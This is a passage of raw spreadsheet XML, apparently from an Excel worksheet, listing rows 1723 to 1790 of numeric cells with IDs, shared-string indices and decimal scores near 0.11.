      </c>
      <c r="B1723" s="2">
        <v>1.8921936E7</v>
      </c>
      <c r="C1723" s="2" t="s">
        <v>1575</v>
      </c>
      <c r="D1723" s="2">
        <v>1.0</v>
      </c>
      <c r="E1723" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1723" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1724" ht="15.75" customHeight="1">
      <c r="A1724" s="1">
        <v>27445.0</v>
      </c>
      <c r="B1724" s="2">
        <v>2.1985013E7</v>
      </c>
      <c r="C1724" s="2" t="s">
        <v>1430</v>
      </c>
      <c r="D1724" s="2">
        <v>1.0</v>
      </c>
      <c r="E1724" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1724" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1725" ht="15.75" customHeight="1">
      <c r="A1725" s="1">
        <v>27469.0</v>
      </c>
      <c r="B1725" s="2">
        <v>2.1988222E7</v>
      </c>
      <c r="C1725" s="2" t="s">
        <v>1544</v>
      </c>
      <c r="D1725" s="2">
        <v>1.0</v>
      </c>
      <c r="E1725" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1725" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1726" ht="15.75" customHeight="1">
      <c r="A1726" s="1">
        <v>27487.0</v>
      </c>
      <c r="B1726" s="2">
        <v>2.2039069E7</v>
      </c>
      <c r="C1726" s="2" t="s">
        <v>1576</v>
      </c>
      <c r="D1726" s="2">
        <v>1.0</v>
      </c>
      <c r="E1726" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1726" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1727" ht="15.75" customHeight="1">
      <c r="A1727" s="1">
        <v>27513.0</v>
      </c>
      <c r="B1727" s="2">
        <v>2.2165499E7</v>
      </c>
      <c r="C1727" s="2" t="s">
        <v>1577</v>
      </c>
      <c r="D1727" s="2">
        <v>1.0</v>
      </c>
      <c r="E1727" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1727" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1728" ht="15.75" customHeight="1">
      <c r="A1728" s="1">
        <v>27668.0</v>
      </c>
      <c r="B1728" s="2">
        <v>2.2924248E7</v>
      </c>
      <c r="C1728" s="2" t="s">
        <v>1578</v>
      </c>
      <c r="D1728" s="2">
        <v>1.0</v>
      </c>
      <c r="E1728" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1728" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1729" ht="15.75" customHeight="1">
      <c r="A1729" s="1">
        <v>27903.0</v>
      </c>
      <c r="B1729" s="2">
        <v>2.3677605E7</v>
      </c>
      <c r="C1729" s="2" t="s">
        <v>1579</v>
      </c>
      <c r="D1729" s="2">
        <v>1.0</v>
      </c>
      <c r="E1729" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1729" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1730" ht="15.75" customHeight="1">
      <c r="A1730" s="1">
        <v>28297.0</v>
      </c>
      <c r="B1730" s="2">
        <v>2.5596297E7</v>
      </c>
      <c r="C1730" s="2" t="s">
        <v>1580</v>
      </c>
      <c r="D1730" s="2">
        <v>1.0</v>
      </c>
      <c r="E1730" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1730" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1731" ht="15.75" customHeight="1">
      <c r="A1731" s="1">
        <v>28656.0</v>
      </c>
      <c r="B1731" s="2">
        <v>2.7410363E7</v>
      </c>
      <c r="C1731" s="2" t="s">
        <v>1581</v>
      </c>
      <c r="D1731" s="2">
        <v>1.0</v>
      </c>
      <c r="E1731" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1731" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1732" ht="15.75" customHeight="1">
      <c r="A1732" s="1">
        <v>28953.0</v>
      </c>
      <c r="B1732" s="2">
        <v>2.9720701E7</v>
      </c>
      <c r="C1732" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="D1732" s="2">
        <v>1.0</v>
      </c>
      <c r="E1732" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1732" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1733" ht="15.75" customHeight="1">
      <c r="A1733" s="1">
        <v>29088.0</v>
      </c>
      <c r="B1733" s="2">
        <v>3.0366813E7</v>
      </c>
      <c r="C1733" s="2" t="s">
        <v>1583</v>
      </c>
      <c r="D1733" s="2">
        <v>1.0</v>
      </c>
      <c r="E1733" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1733" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1734" ht="15.75" customHeight="1">
      <c r="A1734" s="1">
        <v>29186.0</v>
      </c>
      <c r="B1734" s="2">
        <v>3.0715599E7</v>
      </c>
      <c r="C1734" s="2" t="s">
        <v>1584</v>
      </c>
      <c r="D1734" s="2">
        <v>1.0</v>
      </c>
      <c r="E1734" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1734" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1735" ht="15.75" customHeight="1">
      <c r="A1735" s="1">
        <v>29835.0</v>
      </c>
      <c r="B1735" s="2">
        <v>3.5490576E7</v>
      </c>
      <c r="C1735" s="2" t="s">
        <v>1585</v>
      </c>
      <c r="D1735" s="2">
        <v>1.0</v>
      </c>
      <c r="E1735" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1735" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1736" ht="15.75" customHeight="1">
      <c r="A1736" s="1">
        <v>29873.0</v>
      </c>
      <c r="B1736" s="2">
        <v>3.6022638E7</v>
      </c>
      <c r="C1736" s="2" t="s">
        <v>1586</v>
      </c>
      <c r="D1736" s="2">
        <v>1.0</v>
      </c>
      <c r="E1736" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1736" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1737" ht="15.75" customHeight="1">
      <c r="A1737" s="1">
        <v>30003.0</v>
      </c>
      <c r="B1737" s="2">
        <v>3612938.0</v>
      </c>
      <c r="C1737" s="2" t="s">
        <v>1587</v>
      </c>
      <c r="D1737" s="2">
        <v>1.0</v>
      </c>
      <c r="E1737" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1737" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1738" ht="15.75" customHeight="1">
      <c r="A1738" s="1">
        <v>30020.0</v>
      </c>
      <c r="B1738" s="2">
        <v>3.6165804E7</v>
      </c>
      <c r="C1738" s="2" t="s">
        <v>1588</v>
      </c>
      <c r="D1738" s="2">
        <v>1.0</v>
      </c>
      <c r="E1738" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1738" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1739" ht="15.75" customHeight="1">
      <c r="A1739" s="1">
        <v>30255.0</v>
      </c>
      <c r="B1739" s="2">
        <v>3.7598631E7</v>
      </c>
      <c r="C1739" s="2" t="s">
        <v>1589</v>
      </c>
      <c r="D1739" s="2">
        <v>1.0</v>
      </c>
      <c r="E1739" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1739" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1740" ht="15.75" customHeight="1">
      <c r="A1740" s="1">
        <v>30436.0</v>
      </c>
      <c r="B1740" s="2">
        <v>3.9062067E7</v>
      </c>
      <c r="C1740" s="2" t="s">
        <v>1590</v>
      </c>
      <c r="D1740" s="2">
        <v>1.0</v>
      </c>
      <c r="E1740" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1740" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1741" ht="15.75" customHeight="1">
      <c r="A1741" s="1">
        <v>30572.0</v>
      </c>
      <c r="B1741" s="2">
        <v>4.0969564E7</v>
      </c>
      <c r="C1741" s="2" t="s">
        <v>1591</v>
      </c>
      <c r="D1741" s="2">
        <v>1.0</v>
      </c>
      <c r="E1741" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1741" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1742" ht="15.75" customHeight="1">
      <c r="A1742" s="1">
        <v>30610.0</v>
      </c>
      <c r="B1742" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C1742" s="2" t="s">
        <v>1592</v>
      </c>
      <c r="D1742" s="2">
        <v>1.0</v>
      </c>
      <c r="E1742" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1742" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1743" ht="15.75" customHeight="1">
      <c r="A1743" s="1">
        <v>30739.0</v>
      </c>
      <c r="B1743" s="2">
        <v>4.4029816E7</v>
      </c>
      <c r="C1743" s="2" t="s">
        <v>1593</v>
      </c>
      <c r="D1743" s="2">
        <v>1.0</v>
      </c>
      <c r="E1743" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1743" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1744" ht="15.75" customHeight="1">
      <c r="A1744" s="1">
        <v>30770.0</v>
      </c>
      <c r="B1744" s="2">
        <v>4.4546421E7</v>
      </c>
      <c r="C1744" s="2" t="s">
        <v>1553</v>
      </c>
      <c r="D1744" s="2">
        <v>1.0</v>
      </c>
      <c r="E1744" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1744" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1745" ht="15.75" customHeight="1">
      <c r="A1745" s="1">
        <v>30787.0</v>
      </c>
      <c r="B1745" s="2">
        <v>4.4894363E7</v>
      </c>
      <c r="C1745" s="2" t="s">
        <v>1594</v>
      </c>
      <c r="D1745" s="2">
        <v>1.0</v>
      </c>
      <c r="E1745" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1745" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1746" ht="15.75" customHeight="1">
      <c r="A1746" s="1">
        <v>30806.0</v>
      </c>
      <c r="B1746" s="2">
        <v>4.5244333E7</v>
      </c>
      <c r="C1746" s="2" t="s">
        <v>1595</v>
      </c>
      <c r="D1746" s="2">
        <v>1.0</v>
      </c>
      <c r="E1746" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1746" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1747" ht="15.75" customHeight="1">
      <c r="A1747" s="1">
        <v>30898.0</v>
      </c>
      <c r="B1747" s="2">
        <v>4.6675921E7</v>
      </c>
      <c r="C1747" s="2" t="s">
        <v>1596</v>
      </c>
      <c r="D1747" s="2">
        <v>1.0</v>
      </c>
      <c r="E1747" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1747" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1748" ht="15.75" customHeight="1">
      <c r="A1748" s="1">
        <v>31255.0</v>
      </c>
      <c r="B1748" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C1748" s="2" t="s">
        <v>1597</v>
      </c>
      <c r="D1748" s="2">
        <v>1.0</v>
      </c>
      <c r="E1748" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1748" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1749" ht="15.75" customHeight="1">
      <c r="A1749" s="1">
        <v>31259.0</v>
      </c>
      <c r="B1749" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C1749" s="2" t="s">
        <v>1598</v>
      </c>
      <c r="D1749" s="2">
        <v>1.0</v>
      </c>
      <c r="E1749" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1749" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1750" ht="15.75" customHeight="1">
      <c r="A1750" s="1">
        <v>31345.0</v>
      </c>
      <c r="B1750" s="2">
        <v>4983515.0</v>
      </c>
      <c r="C1750" s="2" t="s">
        <v>1599</v>
      </c>
      <c r="D1750" s="2">
        <v>1.0</v>
      </c>
      <c r="E1750" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1750" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1751" ht="15.75" customHeight="1">
      <c r="A1751" s="1">
        <v>31451.0</v>
      </c>
      <c r="B1751" s="2">
        <v>5032230.0</v>
      </c>
      <c r="C1751" s="2" t="s">
        <v>1600</v>
      </c>
      <c r="D1751" s="2">
        <v>1.0</v>
      </c>
      <c r="E1751" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1751" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1752" ht="15.75" customHeight="1">
      <c r="A1752" s="1">
        <v>31568.0</v>
      </c>
      <c r="B1752" s="2">
        <v>5122583.0</v>
      </c>
      <c r="C1752" s="2" t="s">
        <v>1601</v>
      </c>
      <c r="D1752" s="2">
        <v>1.0</v>
      </c>
      <c r="E1752" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1752" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1753" ht="15.75" customHeight="1">
      <c r="A1753" s="1">
        <v>31910.0</v>
      </c>
      <c r="B1753" s="2">
        <v>5299202.0</v>
      </c>
      <c r="C1753" s="2" t="s">
        <v>1602</v>
      </c>
      <c r="D1753" s="2">
        <v>1.0</v>
      </c>
      <c r="E1753" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1753" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1754" ht="15.75" customHeight="1">
      <c r="A1754" s="1">
        <v>32020.0</v>
      </c>
      <c r="B1754" s="2">
        <v>5.3509264E7</v>
      </c>
      <c r="C1754" s="2" t="s">
        <v>1603</v>
      </c>
      <c r="D1754" s="2">
        <v>1.0</v>
      </c>
      <c r="E1754" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1754" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1755" ht="15.75" customHeight="1">
      <c r="A1755" s="1">
        <v>32021.0</v>
      </c>
      <c r="B1755" s="2">
        <v>5.3509264E7</v>
      </c>
      <c r="C1755" s="2" t="s">
        <v>1604</v>
      </c>
      <c r="D1755" s="2">
        <v>1.0</v>
      </c>
      <c r="E1755" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1755" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1756" ht="15.75" customHeight="1">
      <c r="A1756" s="1">
        <v>32057.0</v>
      </c>
      <c r="B1756" s="2">
        <v>5377200.0</v>
      </c>
      <c r="C1756" s="2" t="s">
        <v>1605</v>
      </c>
      <c r="D1756" s="2">
        <v>1.0</v>
      </c>
      <c r="E1756" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1756" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1757" ht="15.75" customHeight="1">
      <c r="A1757" s="1">
        <v>32360.0</v>
      </c>
      <c r="B1757" s="2">
        <v>5.5948391E7</v>
      </c>
      <c r="C1757" s="2" t="s">
        <v>1606</v>
      </c>
      <c r="D1757" s="2">
        <v>1.0</v>
      </c>
      <c r="E1757" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1757" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1758" ht="15.75" customHeight="1">
      <c r="A1758" s="1">
        <v>32362.0</v>
      </c>
      <c r="B1758" s="2">
        <v>5.5948391E7</v>
      </c>
      <c r="C1758" s="2" t="s">
        <v>1607</v>
      </c>
      <c r="D1758" s="2">
        <v>1.0</v>
      </c>
      <c r="E1758" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1758" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1759" ht="15.75" customHeight="1">
      <c r="A1759" s="1">
        <v>32438.0</v>
      </c>
      <c r="B1759" s="2">
        <v>5.6574715E7</v>
      </c>
      <c r="C1759" s="2" t="s">
        <v>1608</v>
      </c>
      <c r="D1759" s="2">
        <v>1.0</v>
      </c>
      <c r="E1759" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1759" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1760" ht="15.75" customHeight="1">
      <c r="A1760" s="1">
        <v>32533.0</v>
      </c>
      <c r="B1760" s="2">
        <v>5734173.0</v>
      </c>
      <c r="C1760" s="2" t="s">
        <v>1609</v>
      </c>
      <c r="D1760" s="2">
        <v>1.0</v>
      </c>
      <c r="E1760" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1760" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1761" ht="15.75" customHeight="1">
      <c r="A1761" s="1">
        <v>32535.0</v>
      </c>
      <c r="B1761" s="2">
        <v>5735094.0</v>
      </c>
      <c r="C1761" s="2" t="s">
        <v>1610</v>
      </c>
      <c r="D1761" s="2">
        <v>1.0</v>
      </c>
      <c r="E1761" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1761" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1762" ht="15.75" customHeight="1">
      <c r="A1762" s="1">
        <v>32808.0</v>
      </c>
      <c r="B1762" s="2">
        <v>6183771.0</v>
      </c>
      <c r="C1762" s="2" t="s">
        <v>1611</v>
      </c>
      <c r="D1762" s="2">
        <v>1.0</v>
      </c>
      <c r="E1762" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1762" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1763" ht="15.75" customHeight="1">
      <c r="A1763" s="1">
        <v>33324.0</v>
      </c>
      <c r="B1763" s="2">
        <v>7541753.0</v>
      </c>
      <c r="C1763" s="2" t="s">
        <v>1612</v>
      </c>
      <c r="D1763" s="2">
        <v>1.0</v>
      </c>
      <c r="E1763" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1763" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1764" ht="15.75" customHeight="1">
      <c r="A1764" s="1">
        <v>33458.0</v>
      </c>
      <c r="B1764" s="2">
        <v>7895341.0</v>
      </c>
      <c r="C1764" s="2" t="s">
        <v>1613</v>
      </c>
      <c r="D1764" s="2">
        <v>1.0</v>
      </c>
      <c r="E1764" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1764" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1765" ht="15.75" customHeight="1">
      <c r="A1765" s="1">
        <v>33498.0</v>
      </c>
      <c r="B1765" s="2">
        <v>8051126.0</v>
      </c>
      <c r="C1765" s="2" t="s">
        <v>1614</v>
      </c>
      <c r="D1765" s="2">
        <v>1.0</v>
      </c>
      <c r="E1765" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1765" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1766" ht="15.75" customHeight="1">
      <c r="A1766" s="1">
        <v>33728.0</v>
      </c>
      <c r="B1766" s="2">
        <v>8526329.0</v>
      </c>
      <c r="C1766" s="2" t="s">
        <v>1615</v>
      </c>
      <c r="D1766" s="2">
        <v>1.0</v>
      </c>
      <c r="E1766" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1766" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1767" ht="15.75" customHeight="1">
      <c r="A1767" s="1">
        <v>33740.0</v>
      </c>
      <c r="B1767" s="2">
        <v>8555883.0</v>
      </c>
      <c r="C1767" s="2" t="s">
        <v>1565</v>
      </c>
      <c r="D1767" s="2">
        <v>1.0</v>
      </c>
      <c r="E1767" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1767" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1768" ht="15.75" customHeight="1">
      <c r="A1768" s="1">
        <v>33758.0</v>
      </c>
      <c r="B1768" s="2">
        <v>8605420.0</v>
      </c>
      <c r="C1768" s="2" t="s">
        <v>1616</v>
      </c>
      <c r="D1768" s="2">
        <v>1.0</v>
      </c>
      <c r="E1768" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1768" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1769" ht="15.75" customHeight="1">
      <c r="A1769" s="1">
        <v>34076.0</v>
      </c>
      <c r="B1769" s="2">
        <v>9664273.0</v>
      </c>
      <c r="C1769" s="2" t="s">
        <v>1617</v>
      </c>
      <c r="D1769" s="2">
        <v>1.0</v>
      </c>
      <c r="E1769" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1769" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1770" ht="15.75" customHeight="1">
      <c r="A1770" s="1">
        <v>34087.0</v>
      </c>
      <c r="B1770" s="2">
        <v>9681304.0</v>
      </c>
      <c r="C1770" s="2" t="s">
        <v>1618</v>
      </c>
      <c r="D1770" s="2">
        <v>1.0</v>
      </c>
      <c r="E1770" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1770" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1771" ht="15.75" customHeight="1">
      <c r="A1771" s="1">
        <v>7648.0</v>
      </c>
      <c r="B1771" s="2">
        <v>5.1780966E7</v>
      </c>
      <c r="C1771" s="2" t="s">
        <v>1619</v>
      </c>
      <c r="D1771" s="2">
        <v>1.0</v>
      </c>
      <c r="E1771" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1771" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="1772" ht="15.75" customHeight="1">
      <c r="A1772" s="1">
        <v>13792.0</v>
      </c>
      <c r="B1772" s="2">
        <v>3.6590681E7</v>
      </c>
      <c r="C1772" s="2" t="s">
        <v>1620</v>
      </c>
      <c r="D1772" s="2">
        <v>1.0</v>
      </c>
      <c r="E1772" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1772" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="1773" ht="15.75" customHeight="1">
      <c r="A1773" s="1">
        <v>15798.0</v>
      </c>
      <c r="B1773" s="2">
        <v>4.4211439E7</v>
      </c>
      <c r="C1773" s="2" t="s">
        <v>1621</v>
      </c>
      <c r="D1773" s="2">
        <v>1.0</v>
      </c>
      <c r="E1773" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1773" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="1774" ht="15.75" customHeight="1">
      <c r="A1774" s="1">
        <v>17979.0</v>
      </c>
      <c r="B1774" s="2">
        <v>5.137653E7</v>
      </c>
      <c r="C1774" s="2" t="s">
        <v>1622</v>
      </c>
      <c r="D1774" s="2">
        <v>1.0</v>
      </c>
      <c r="E1774" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1774" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="1775" ht="15.75" customHeight="1">
      <c r="A1775" s="1">
        <v>21912.0</v>
      </c>
      <c r="B1775" s="2">
        <v>2.8149391E7</v>
      </c>
      <c r="C1775" s="2" t="s">
        <v>1068</v>
      </c>
      <c r="D1775" s="2">
        <v>1.0</v>
      </c>
      <c r="E1775" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1775" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="1776" ht="15.75" customHeight="1">
      <c r="A1776" s="1">
        <v>25625.0</v>
      </c>
      <c r="B1776" s="2">
        <v>1.4451604E7</v>
      </c>
      <c r="C1776" s="2" t="s">
        <v>1623</v>
      </c>
      <c r="D1776" s="2">
        <v>1.0</v>
      </c>
      <c r="E1776" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1776" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="1777" ht="15.75" customHeight="1">
      <c r="A1777" s="1">
        <v>31705.0</v>
      </c>
      <c r="B1777" s="2">
        <v>5.1976531E7</v>
      </c>
      <c r="C1777" s="2" t="s">
        <v>1624</v>
      </c>
      <c r="D1777" s="2">
        <v>1.0</v>
      </c>
      <c r="E1777" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1777" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="1778" ht="15.75" customHeight="1">
      <c r="A1778" s="1">
        <v>6738.0</v>
      </c>
      <c r="B1778" s="2">
        <v>4.9348809E7</v>
      </c>
      <c r="C1778" s="2" t="s">
        <v>1625</v>
      </c>
      <c r="D1778" s="2">
        <v>1.0</v>
      </c>
      <c r="E1778" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1778" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="1779" ht="15.75" customHeight="1">
      <c r="A1779" s="1">
        <v>22340.0</v>
      </c>
      <c r="B1779" s="2">
        <v>3.4462746E7</v>
      </c>
      <c r="C1779" s="2" t="s">
        <v>1626</v>
      </c>
      <c r="D1779" s="2">
        <v>1.0</v>
      </c>
      <c r="E1779" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1779" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="1780" ht="15.75" customHeight="1">
      <c r="A1780" s="1">
        <v>30449.0</v>
      </c>
      <c r="B1780" s="2">
        <v>3.9313154E7</v>
      </c>
      <c r="C1780" s="2" t="s">
        <v>1627</v>
      </c>
      <c r="D1780" s="2">
        <v>1.0</v>
      </c>
      <c r="E1780" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1780" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="1781" ht="15.75" customHeight="1">
      <c r="A1781" s="1">
        <v>22054.0</v>
      </c>
      <c r="B1781" s="2">
        <v>3.0423564E7</v>
      </c>
      <c r="C1781" s="2" t="s">
        <v>1628</v>
      </c>
      <c r="D1781" s="2">
        <v>1.0</v>
      </c>
      <c r="E1781" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1781" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="1782" ht="15.75" customHeight="1">
      <c r="A1782" s="1">
        <v>28823.0</v>
      </c>
      <c r="B1782" s="2">
        <v>2.8803825E7</v>
      </c>
      <c r="C1782" s="2" t="s">
        <v>1629</v>
      </c>
      <c r="D1782" s="2">
        <v>1.0</v>
      </c>
      <c r="E1782" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1782" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="1783" ht="15.75" customHeight="1">
      <c r="A1783" s="1">
        <v>31157.0</v>
      </c>
      <c r="B1783" s="2">
        <v>4899065.0</v>
      </c>
      <c r="C1783" s="2" t="s">
        <v>1630</v>
      </c>
      <c r="D1783" s="2">
        <v>1.0</v>
      </c>
      <c r="E1783" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1783" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="1784" ht="15.75" customHeight="1">
      <c r="A1784" s="1">
        <v>29836.0</v>
      </c>
      <c r="B1784" s="2">
        <v>3.5490576E7</v>
      </c>
      <c r="C1784" s="2" t="s">
        <v>1631</v>
      </c>
      <c r="D1784" s="2">
        <v>1.0</v>
      </c>
      <c r="E1784" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1784" s="2">
        <v>0.1102693602693603</v>
      </c>
    </row>
    <row r="1785" ht="15.75" customHeight="1">
      <c r="A1785" s="1">
        <v>29733.0</v>
      </c>
      <c r="B1785" s="2">
        <v>3.4565989E7</v>
      </c>
      <c r="C1785" s="2" t="s">
        <v>1632</v>
      </c>
      <c r="D1785" s="2">
        <v>1.0</v>
      </c>
      <c r="E1785" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1785" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="1786" ht="15.75" customHeight="1">
      <c r="A1786" s="1">
        <v>21698.0</v>
      </c>
      <c r="B1786" s="2">
        <v>2.5224221E7</v>
      </c>
      <c r="C1786" s="2" t="s">
        <v>1633</v>
      </c>
      <c r="D1786" s="2">
        <v>1.0</v>
      </c>
      <c r="E1786" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1786" s="2">
        <v>0.110200364298725</v>
      </c>
    </row>
    <row r="1787" ht="15.75" customHeight="1">
      <c r="A1787" s="1">
        <v>20303.0</v>
      </c>
      <c r="B1787" s="2">
        <v>1.1327064E7</v>
      </c>
      <c r="C1787" s="2" t="s">
        <v>1634</v>
      </c>
      <c r="D1787" s="2">
        <v>1.0</v>
      </c>
      <c r="E1787" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1787" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="1788" ht="15.75" customHeight="1">
      <c r="A1788" s="1">
        <v>22752.0</v>
      </c>
      <c r="B1788" s="2">
        <v>4.4517126E7</v>
      </c>
      <c r="C1788" s="2" t="s">
        <v>1635</v>
      </c>
      <c r="D1788" s="2">
        <v>1.0</v>
      </c>
      <c r="E1788" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1788" s="2">
        <v>0.1101851851851851</v>
      </c>
    </row>
    <row r="1789" ht="15.75" customHeight="1">
      <c r="A1789" s="1">
        <v>23247.0</v>
      </c>
      <c r="B1789" s="2">
        <v>5.3070876E7</v>
      </c>
      <c r="C1789" s="2" t="s">
        <v>1636</v>
      </c>
      <c r="D1789" s="2">
        <v>1.0</v>
      </c>
      <c r="E1789" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1789" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="1790" ht="15.75" customHeight="1">
      <c r="A1790" s="1">
        <v>29720.0</v>
      </c>
      <c r="B1790" s="2">
        <v>3.4462745E7</v>
      </c>
      <c r="C1790" s="2" t="s">
        <v>1637</v>
      </c>
      <c r="D1790" s="2">
        <v>1.0</v>
